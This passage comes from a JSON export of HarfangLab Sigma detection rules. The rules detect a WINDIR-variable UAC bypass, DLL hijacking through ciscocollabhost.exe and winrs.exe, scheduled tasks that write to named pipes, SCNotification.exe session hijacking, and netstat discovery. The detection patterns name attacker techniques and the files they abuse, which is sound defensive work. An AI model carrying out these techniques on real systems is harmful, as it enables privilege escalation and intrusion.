"content": "title: WINDIR User Environment Variable Modified\nid: 7e0790b6-dbc2-4252-bd87-d553bb718f71\ndescription: |\n Detects the modification of the WINDIR user environment variable.\n The WINDIR environment variable is not defined by default in the user environment variables.\n The modification of this variable can be related to a UAC bypass using the DiskCleanup scheduled task.\n It is recommended to investigate the process that changed the value, as well as its parent for any suspicious activity.\nreferences:\n - https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\ndate: 2020/10/09\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject: 'HKU\\\\*\\Environment\\windir'\n\n filter_empty:\n Details: '(Empty)'\n\n filter_windows:\n Details: '?:\\WINDOWS'\n\n selection_rename:\n EventType: 'RenameKey'\n NewName: 'HKU\\\\*\\Environment\\windir'\n\n condition: (selection_set_value and not 1 of filter_*) or selection_rename\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7e0790b6-dbc2-4252-bd87-d553bb718f71",
"rule_name": "WINDIR User Environment Variable Modified",
"rule_description": "Detects the modification of the WINDIR user environment variable.\nThe WINDIR environment variable is not defined by default in the user environment variables.\nThe modification of this variable can be related to a UAC bypass using the DiskCleanup scheduled task.\nIt is recommended to investigate the process that changed the value, as well as its parent for any suspicious activity.\n",
"rule_creation_date": "2020-10-09",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7e1dd922-2be2-484d-b721-57f2d4be98dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589123Z",
"creation_date": "2026-03-23T11:45:34.589127Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589134Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ciscocollabhost.yml",
"content": "title: DLL Hijacking via ciscocollabhost.exe\nid: 7e1dd922-2be2-484d-b721-57f2d4be98dd\ndescription: |\n Detects potential Windows DLL Hijacking via ciscocollabhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/09\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CiscoCollabHost.exe'\n ProcessSignature: 'Cisco Systems, Inc.'\n ImageLoaded|endswith: '\\ciscosparklauncher.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Cisco Spark\\'\n - '?:\\Program Files\\Cisco Spark\\'\n - '?:\\Program Files (x86)\\Cisco Spark\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Cisco Spark\\'\n - '?:\\Program Files\\Cisco Spark\\'\n - '?:\\Program Files (x86)\\Cisco Spark\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Cisco Systems, Inc.'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7e1dd922-2be2-484d-b721-57f2d4be98dd",
"rule_name": "DLL Hijacking via ciscocollabhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ciscocollabhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7e34add6-fb2b-4c0f-b6f2-e76d5930ab5a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599940Z",
"creation_date": "2026-03-23T11:45:34.599943Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599951Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winrs.yml",
"content": "title: DLL Hijacking via winrs.exe\nid: 7e34add6-fb2b-4c0f-b6f2-e76d5930ab5a\ndescription: |\n Detects potential Windows DLL Hijacking via winrs.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'winrs.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DSROLE.dll'\n - '\\mi.dll'\n - '\\miutils.dll'\n - '\\wsmsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7e34add6-fb2b-4c0f-b6f2-e76d5930ab5a",
"rule_name": "DLL Hijacking via winrs.exe",
"rule_description": "Detects potential Windows DLL Hijacking via winrs.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7e47bfec-3c33-40d7-8d74-c89094ba1371",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625535Z",
"creation_date": "2026-03-23T11:45:34.625537Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625541Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/",
"https://attack.mitre.org/techniques/T1059/003/"
],
"name": "t1053_scheduled_task_pipe_commandline.yml",
"content": "title: Scheduled Task with Named Pipe in Action Created\nid: 7e47bfec-3c33-40d7-8d74-c89094ba1371\ndescription: |\n Detects a scheduled task being created with one of the actions outputting to a named pipe.\n It is common for attackers to create a scheduled task that launches a script or command that sends its output to a named pipe. This allows attackers to evade defenses by decorrelating usual parent-child relationships to make analysis harder.\n It is recommended to investigate the process that created the scheduled task and the scheduled task itself as well as any spawned processes to determine if they are legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\n - https://attack.mitre.org/techniques/T1059/003/\ndate: 2025/12/16\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1053.005\n - attack.execution\n - attack.t1059.003\n - attack.t1159\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection:\n OperationType:\n - 'create'\n - 'update'\n FirstActionCommandLine|contains: '\\pipe\\'\n\n exclusion_ms_restart_manager:\n FirstActionCommandLine|contains|all:\n - '?:\\Windows\\system32\\rmclient.exe'\n - '\\pipe\\RestartManager-{????????-????-????-????-????????????}'\n\n exclusion_mssql_query:\n FirstActionCommandLine|contains|all:\n - '\\Microsoft SQL Server\\SQLCMD\\SQLCMD.exe'\n - '-S \\\\.\\pipe\\Microsoft##WID\\tsql\\query'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7e47bfec-3c33-40d7-8d74-c89094ba1371",
"rule_name": "Scheduled Task with Named Pipe in Action Created",
"rule_description": "Detects a scheduled task being created with one of the actions outputting to a named pipe.\nIt is common for attackers to create a scheduled task that launches a script or command that sends its output to a named pipe. This allows attackers to evade defenses by decorrelating usual parent-child relationships to make analysis harder.\nIt is recommended to investigate the process that created the scheduled task and the scheduled task itself as well as any spawned processes to determine if they are legitimate.\n",
"rule_creation_date": "2025-12-16",
"rule_modified_date": "2025-12-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1059.003",
"attack.t1159"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7ee4cf79-a255-401f-9014-daf70499ceee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072811Z",
"creation_date": "2026-03-23T11:45:34.072813Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072817Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en",
"https://github.com/mandiant/ccmpwn",
"https://attack.mitre.org/techniques/T1072/"
],
"name": "t1072_scnotification_process_exec.yml",
"content": "title: Windows Session Hijacking via SCNotification.exe\nid: 7ee4cf79-a255-401f-9014-daf70499ceee\ndescription: |\n Detects the execution of an uncommon process by SCNotification.exe.\n Adversaries may abuse SCNotification.exe by modifying its configuration to execute an AppDomainManager payload and execute arbitrary commands.\n It is recommended to check the content of the SCNotification.exe.config file in the same folder that the SCNotification.exe executable to identify any malicious content and check actions made by the child process.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en\n - https://github.com/mandiant/ccmpwn\n - https://attack.mitre.org/techniques/T1072/\ndate: 2024/07/31\nmodified: 2025/06/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.lateral_movement\n - attack.t1072\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\SCNotification.exe'\n # If we cannot read info about the file, we can't verify the signature\n ProcessSha256|contains: '?'\n\n filter_legitimate:\n - Image:\n - '?:\\Windows\\System32\\werfault.exe'\n - '?:\\WINDOWS\\SysWOW64\\WerFault.exe'\n - Image|endswith:\n - '\\SCNotification.exe'\n - '\\SCClient.exe'\n - '\\SCToastNotification.exe'\n Signed: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_edge:\n CommandLine|contains: '\\Microsoft\\Edge\\Application\\msedge.exe --single-argument http://go.microsoft.com/fwlink/'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7ee4cf79-a255-401f-9014-daf70499ceee",
"rule_name": "Windows Session Hijacking via SCNotification.exe",
"rule_description": "Detects the execution of an uncommon process by SCNotification.exe.\nAdversaries may abuse SCNotification.exe by modifying its configuration to execute an AppDomainManager payload and execute arbitrary commands.\nIt is recommended to check the content of the SCNotification.exe.config file in the same folder that the SCNotification.exe executable to identify any malicious content and check actions made by the child process.\n",
"rule_creation_date": "2024-07-31",
"rule_modified_date": "2025-06-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1072"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7ef0ab65-9717-4532-ac6a-77b151ac6a3d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613240Z",
"creation_date": "2026-03-23T11:45:34.613243Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613250Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/netstat.8.html",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/software/S0104/"
],
"name": "t1049_netstat_linux.yml",
"content": "title: Network Statistics Discovered via Netstat (Linux)\nid: 7ef0ab65-9717-4532-ac6a-77b151ac6a3d\ndescription: |\n Detects the execution of the netstat command to display the contents of various network-related data structures.\n Attackers may use it during discovery phase to retrieve network connection statistics and gather active connections' IP and port.\n It is recommended to look for other network discovery activities, and create a baseline of legitimate administrative netstat usage to identify potential reconnaissance activity.\nreferences:\n - https://man7.org/linux/man-pages/man8/netstat.8.html\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0104/\ndate: 2022/12/23\nmodified: 2025/10/08\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.s0104\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image: 'THIS_RULE_IS_DISABLED'\n\n condition: selection\n\n # selection:\n # Image|endswith: '/netstat'\n # ParentImage|startswith: '/' # Filter-out missing parents\n # GrandparentImage|startswith: '/' # Filter-out missing grandparents\n\n # exclusion_periodic_status_network:\n # ParentCommandLine: '/bin/sh /etc/periodic/daily/420.status-network'\n # CommandLine: 'netstat -i'\n\n # exclusion_munin:\n # - ParentCommandLine:\n # - '/bin/sh /etc/munin/plugins/*'\n # - '/usr/bin/sh /etc/munin/plugins/*'\n # - '/usr/bin/perl -wT /usr/sbin/munin-node'\n # - GrandparentCommandLine:\n # - '/usr/sbin/munin-node [127.0.0.1]'\n # - '/usr/sbin/munin-node [::ffff:127.0.0.1]'\n # - '/usr/bin/perl -wT /usr/sbin/munin-node'\n\n # exclusion_nmon:\n # GrandparentImage: '/usr/bin/nmon'\n\n # exclusion_rapid7:\n # ParentCommandLine|startswith:\n # - \"/bin/bash -c echo 'Rapid7Echo'; (LANG=C;LANGUAGE=\"\n # - 'bash -c LANG=C;LANGUAGE=en;netstat -plunt'\n\n # exclusion_insights_client:\n # ParentImage: '/usr/bin/timeout'\n # GrandparentCommandLine|contains:\n # - '/site-packages/insights_client/run.py'\n # - '/bin/insights-client-run'\n # - '/bin/redhat-access-insights'\n\n # exclusion_insights_client_2:\n # ParentCommandLine|startswith:\n # - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n # - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py '\n\n # exclusion_sap:\n # - ParentImage:\n # - '/usr/sap/hostctrl/exe/sapacosprep'\n # - '/usr/sap/hostctrl/exe/sapacext'\n # - GrandparentImage:\n # - '/usr/sap/hostctrl/exe/saposcol'\n\n # exclusion_glpi_agent:\n # # /usr/bin/perl\n # # /tmp/.mount_glpi-aYA0UzH/usr/bin/perl\n # ParentImage: '*/usr/bin/perl'\n # ParentCommandLine|startswith: 'glpi-agent'\n\n # exclusion_glpi_agent_2:\n # GrandparentCommandLine|contains:\n # - 'glpi-agent ('\n # - 'glpi-agent:'\n # - '/usr/bin/glpi-agent'\n\n # # https://github.com/ansible/awx\n # exclusion_ansibleawx:\n # User: 'ansibleawx'\n # GrandparentCommandLine: 'sshd: ansibleawx@notty'\n\n # exclusion_qualys1:\n # GrandparentImage:\n # - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n # - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n # exclusion_qualys2:\n # CommandLine:\n # - 'netstat -nlp'\n # - 'netstat -pln'\n # - 'netstat -lnp'\n # - 'netstat -lntp'\n # - 'netstat -anup'\n # ParentImage: '/usr/bin/timeout'\n # GrandparentImage: '/usr/bin/bash'\n # exclusion_qualys3:\n # CommandLine:\n # - 'netstat -i'\n # - 'netstat -an'\n # - 'netstat -tn'\n # - 'netstat -anu'\n # - 'netstat -atnp'\n # - 'netstat -tulnp'\n # - 'netstat -tupln'\n # ParentImage: '/usr/bin/timeout'\n # GrandparentImage: '/usr/bin/bash'\n\n # exclusion_udscan:\n # - ParentImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n # - GrandparentImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n\n # exclusion_fusioninventory:\n # - ParentCommandLine|startswith: 'fusioninventory-agent'\n # - GrandparentCommandLine|startswith:\n # - 'fusioninventory-agent'\n # - '/usr/bin/perl /usr/bin/fusioninventory-agent'\n\n # exclusion_cpsureproxy:\n # ParentCommandLine: '/bin/bash /etc/rc.d/init.d/cpsureproxy-web start'\n\n # exclusion_oracle:\n # - ParentImage:\n # - '/u01/app/oracle/product/agent*/agent_*/perl/bin/perl'\n # - '/u01/app/oracle/product/agent*/agent_*/oracle_common/jdk/bin/java'\n # - '/opt/app/oracle/agent*/agent_*/perl/bin/perl'\n # - '/opt/app/oracle/agent*/agent*/oracle_common/jdk/bin/java'\n # - '/u01/app/oracle/agent/agent_*/oracle_common/jdk/bin/java'\n # - '/u01/app/oracle/agent/agent_*/perl/bin/perl'\n # - GrandparentImage:\n # - '/u01/app/*/perl/bin/perl'\n # - '/u01/app/*/jdk/bin/java'\n # - '/opt/app/*/perl/bin/perl'\n # - '/opt/app/*/jdk/bin/java'\n # - '/tmp/CVU_*_resource/exectask'\n # - ParentCommandLine:\n # - '*> /tmp/CVU_*_resource/scratch/exout*.out 2>/dev/null'\n\n # exclusion_zabbix:\n # - GrandparentImage: '/usr/sbin/zabbix_agent2'\n # - GrandparentImage|endswith: '/zabbix/sbin/zabbix_agentd'\n # - GrandparentCommandLine:\n # - '/usr/bin/perl /etc/zabbix/zabbix_agentd.d/discovery_udp_services.pl'\n # - '/usr/bin/perl /etc/zabbix/zabbix_agentd.d/discovery_tcp_services.pl'\n\n # exclusion_runc:\n # GrandparentImage: '/usr/bin/runc'\n\n # exclusion_tug:\n # GrandparentCommandLine|contains:\n # - '/usr/lib/tug/env/bin/python /usr/sbin/tug_sysmetrics.py'\n # - '/usr/bin/python3 /usr/sbin/mbg-cronlock /var/run/tug-system-metrics.lock /usr/sbin/tug_sysmetrics.py'\n # - '/bin/sh -c /usr/sbin/mbg-cronlock /var/run/tug-system-metrics.lock /usr/sbin/tug_sysmetrics.py'\n\n # exclusion_zabbix:\n # - GrandparentImage: '/usr/sbin/zabbix_agent2'\n # - GrandparentCommandLine:\n # - '/usr/bin/perl /etc/zabbix/zabbix_agentd.d/discovery_udp_services.pl'\n # - '/usr/bin/perl /etc/zabbix/zabbix_agentd.d/discovery_tcp_services.pl'\n\n # exclusion_dynamosoft:\n # GrandparentImage: '/opt/dynamsoft/DynamsoftService/DynamsoftService'\n\n # exclusion_netbackup:\n # GrandparentImage: '/usr/openv/netbackup/bin/private/nbsu'\n\n # exclusion_xc7controlm:\n # GrandparentCommandLine|contains:\n # - '/product/xc7controlm/ag/ctmagrec/ctm/scripts/shut-ag'\n # - '/product/xc7controlm/ag/ctmagrec/ctm/scripts/start-ag'\n # - '/product/xc7controlm/ag/ctmagrec/ctm/scripts/shagent'\n\n # exclusion_moba:\n # ParentCommandLine|contains|all:\n # - 'sh -c while true; do sleep 1;head -v -n 8 /proc/meminfo; head -v -n 2 /proc/stat /proc/version /proc/uptime /proc/loadavg /proc/sys/fs/file-nr /proc/sys/kernel/hostname; tail -v -n ?? /proc/net/dev;echo ?==> /proc/df <==?;'\n # - 'echo ?==> /proc/who <==?;who;echo ?==> /proc/end <==?;echo ?##Moba##?; done'\n # GrandparentImage: '/usr/sbin/sshd'\n\n # exclusion_lynis:\n # ParentCommandLine:\n # - '/bin/sh ./lynis audit system'\n # - '/bin/sh /usr/bin/lynis audit system --cronjob'\n # - '/bin/sh /usr/sbin/lynis --quick --no-colors*'\n\n # exclusion_chkrootkit:\n # - ParentCommandLine:\n # - '/bin/sh /usr/sbin/chkrootkit'\n # - '/bin/bash /etc/cron.daily/chkrootkit.sh'\n # - '/bin/sh /etc/cron.daily/chkrootkit'\n # - GrandparentCommandLine:\n # - '/bin/bash /etc/cron.daily/chkrootkit.sh'\n # - '/bin/bash /bin/run-parts /etc/cron.daily'\n\n # exclusion_wazuh:\n # GrandparentImage:\n # - '/var/ossec/bin/wazuh-syscheckd'\n # - '/var/ossec/bin/wazuh-logcollector'\n\n # exclusion_pandora:\n # - ParentCommandLine: '/bin/bash /etc/pandora/plugins/pandora_netusage'\n # - GrandparentCommandLine: '/usr/bin/perl /usr/bin/pandora_agent /etc/pandora'\n\n # exclusion_illumio_ven:\n # ParentImage: '/opt/illumio_ven/bin/venAgentMgr'\n\n # exclusion_nagios:\n # ProcessParentCommandLine|contains: '/nagios/plugins/check_netstat '\n\n # exclusion_isa:\n # ParentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n # exclusion_observium:\n # ParentCommandLine: '/bin/bash /usr/bin/observium_agent'\n\n # exclusion_amp_watchdog:\n # GrandparentImage: '/opt/quest/kace/bin/AMPWatchDog'\n\n # exclusion_prodige_jbossadmin:\n # ParentCommandLine|startswith: '/bin/bash /prodige/server/production/ord1/jbossadmin/jbossadmin '\n\n # exclusion_iptables:\n # ParentCommandLine|startswith: '/bin/bash /etc/network/iptables/'\n\n # exclusion_wicd:\n # ParentCommandLine|startswith: '/usr/bin/python -o /usr/share/wicd/daemon/wicd-daemon.py'\n\n # exclusion_cfengine:\n # - ParentImage|startswith: '/var/cfengine/'\n # - ParentCommandLine|contains: '/var/cfengine/'\n\n # exclusion_sosreport:\n # - GrandparentCommandLine: '/usr/bin/python /usr/sbin/sosreport'\n # - GrandparentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n\n # exclusion_centreon:\n # - ParentCommandLine|startswith: '/usr/bin/perl /usr/lib/centreon/plugins/centreon_linux_local.pl'\n # - GrandparentCommandLine|startswith:\n # - '/usr/sbin/nrpe -c /etc/nrpe/centreon-nrpe3.cfg -f'\n # - '/usr/sbin/centreon-nrpe3 -c /etc/nrpe/centreon-nrpe3.cfg -d'\n\n # exclusion_sas:\n # ParentCommandLine|startswith: '/opt/sas/sashome/sasprivatejavaruntimeenvironment/*/jre/bin/java'\n\n # condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7ef0ab65-9717-4532-ac6a-77b151ac6a3d",
"rule_name": "Network Statistics Discovered via Netstat (Linux)",
"rule_description": "Detects the execution of the netstat command to display the contents of various network-related data structures.\nAttackers may use it during discovery phase to retrieve network connection statistics and gather active connections' IP and port.\nIt is recommended to look for other network discovery activities, and create a baseline of legitimate administrative netstat usage to identify potential reconnaissance activity.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-10-08",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7ef5765c-b012-4951-9fc8-5dfa739c8d6c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
